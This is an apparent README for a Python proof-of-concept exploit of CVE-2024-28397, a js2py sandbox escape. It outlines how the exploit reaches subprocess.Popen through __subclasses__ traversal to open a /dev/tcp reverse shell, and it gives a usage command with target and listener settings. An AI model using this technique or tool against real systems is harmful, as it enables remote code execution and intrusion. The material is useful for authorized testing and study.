This repository contains a Proof of Concept (PoC) for CVE-2024-28397, a vulnerability in the js2py library allowing a sandbox escape to achieve remote code execution.
Description
This repository contains a Python-based Proof of Concept (PoC) for CVE-2024-28397, a sandbox escape vulnerability in the Js2Py JavaScript interpreter for Python. When the target application evaluates untrusted JS code via Js2Py, an attacker can break out of the sandbox and execute arbitrary Python code. This can be leveraged to gain remote code execution (RCE) and a reverse shell on the vulnerable system.
This exploit was inspired by Marven11’s CVE-2024-28397-js2py-Sandbox-Escape project.
Disclaimer
This script is provided for educational and authorized penetration testing purposes only. Unauthorized use of this script against systems you do not own or have explicit permission to test is illegal and unethical. The author assumes no responsibility for misuse or damage caused by this script.
About the Vulnerability
__class__.__base__.__subclasses__, leading to arbitrary code executionFeatures
Requirements
requests module (pip install requests)/dev/tcp reverse shell)Usage
python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
--target: The full URL to the vulnerable web app endpoint--lhost: Your local IP address (used for reverse shell)--lport: Your local port to receive the shellHow It Works
__class__.__base__.__subclasses__() to find subprocess.Popen.Popen to decode and execute the shell.